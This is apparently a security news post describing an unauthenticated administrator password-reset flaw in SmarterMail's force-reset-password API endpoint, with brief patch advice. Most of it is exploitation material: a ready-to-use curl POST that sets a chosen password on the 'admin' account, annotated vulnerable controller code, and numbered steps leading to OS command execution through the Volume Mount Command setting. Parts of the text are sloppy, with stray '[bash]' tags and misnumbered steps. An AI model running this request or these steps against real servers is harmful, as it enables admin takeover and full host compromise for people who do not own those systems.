Listen to this Post
The vulnerability is in the `ForceResetPassword` API endpoint within the AuthenticationController. This endpoint is decorated with [AuthenticatedService(AllowAnonymous = true)], permitting unauthenticated access. When a HTTP POST request is sent to /api/v1/auth/force-reset-password, the method processes a `ForceResetPasswordInputs` object from the request body. A critical user-controlled property is IsSysAdmin. When this boolean is set to true, the code path for resetting a system administrator’s password is executed. This path calls `AdministratorGetByUsername(inputs.Username)` to retrieve the administrator’s database record. It then validates the strength of the attacker-supplied `NewPassword` but crucially skips any verification of the `OldPassword` or a password reset token. Finally, it creates a new `db_system_administrator` object with the new password hash and calls `AdministratorUpdate` to save it to the database. This allows an unauthenticated attacker to reset any known administrator account’s password. With system admin access, an attacker can navigate to built-in features like “Volume Mounts” and execute arbitrary OS commands via the “Volume Mount Command” field, leading to full host compromise.
Platform: SmarterMail
Version: Prior build 9511
Vulnerability: Authentication bypass API
Severity: Critical
date: 2026-01-15
Prediction: Patched 2026-01-15
What Undercode Say:
Bash Commands:
curl -X POST https://target:9998/api/v1/auth/force-reset-password -H "Content-Type: application/json" -d '{"IsSysAdmin":"true","Username":"admin","NewPassword":"AttackerP@ss123","ConfirmPassword":"AttackerP@ss123"}'
Related Code:
// From SmarterMail.Web.Api.AuthenticationController
[bash]
[Route("force-reset-password")]
[AuthenticatedService(AllowAnonymous = true)] // Allows unauthenticated access
public ActionResult<ResetPasswordResult> ForceResetPassword([bash] ForceResetPasswordInputs inputs)
{
// ... calls instance.ForcePasswordReset(inputs, ...);
}
// In the ForcePasswordReset method logic branch for inputs.IsSysAdmin == true
db_system_administrator_readonly admin = SystemRepository.Instance.AdministratorGetByUsername(inputs.Username);
// ... validates new password strength only ...
db_system_administrator item = new db_system_administrator
{
guid = admin.guid,
Password = inputs.NewPassword, // Attacker-controlled value
};
SystemRepository.Instance.AdministratorUpdate(item, ...); // Updates password without authentication
How Exploit:
1. Attacker identifies target SmarterMail instance.
- Sends crafted POST request to `force-reset-password` endpoint with
IsSysAdmin=true, a known or guessed adminUsername, and a newNewPassword.
3. Request succeeds, resetting the administrator’s password.
4. Attacker logs in with new credentials.
5. Navigates to Settings -> Volume Mounts.
- Enters OS command in “Volume Mount Command” field, gaining immediate RCE.
Protection from this CVE
Update to build 9511+.
Restrict network access.
Monitor authentication logs.
Impact
Full system compromise.
Unauthenticated admin takeover.
Remote code execution.
Complete data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

